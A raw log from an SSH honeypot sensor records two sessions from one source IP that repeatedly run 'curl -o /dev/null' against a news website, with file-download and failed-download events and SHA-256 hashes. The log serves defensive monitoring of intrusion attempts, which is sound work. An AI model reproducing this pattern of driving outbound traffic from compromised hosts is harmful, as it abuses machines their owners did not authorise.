{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.818998Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.821784Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.825552Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.826555Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.827430Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.856409Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.857911Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.861538Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.863842Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.865571Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.866745Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.913135Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.914361Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.921818Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.923004Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.932218Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.935827Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.963581Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.981176Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.982414Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:27.989086Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.990163Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:27.995073Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.011017Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.036985Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.038154Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.039165Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.042514Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.043411Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.073981Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.089242Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.090392Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.092682Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.093675Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.119046Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.129383Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.130626Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.133885Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.135019Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.150941Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.166000Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.171430Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.172613Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.176208Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.177136Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.205686Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.214330Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.215599Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.220713Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.221785Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.224854Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.245552Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.261677Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.262705Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.266233Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.267298Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.270649Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.297876Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.301246Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.302832Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.305540Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.306422Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.319438Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.326276Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.342134Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.343255Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.346158Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.347401Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.363245Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.381160Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.382478Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.385883Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.387022Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.390249Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.399498Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.406481Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.407995Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.417973Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.419254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.427805Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.429059Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.446222Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.448718Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.454207Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.455608Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:28.467517Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.468961Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:28.480660Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
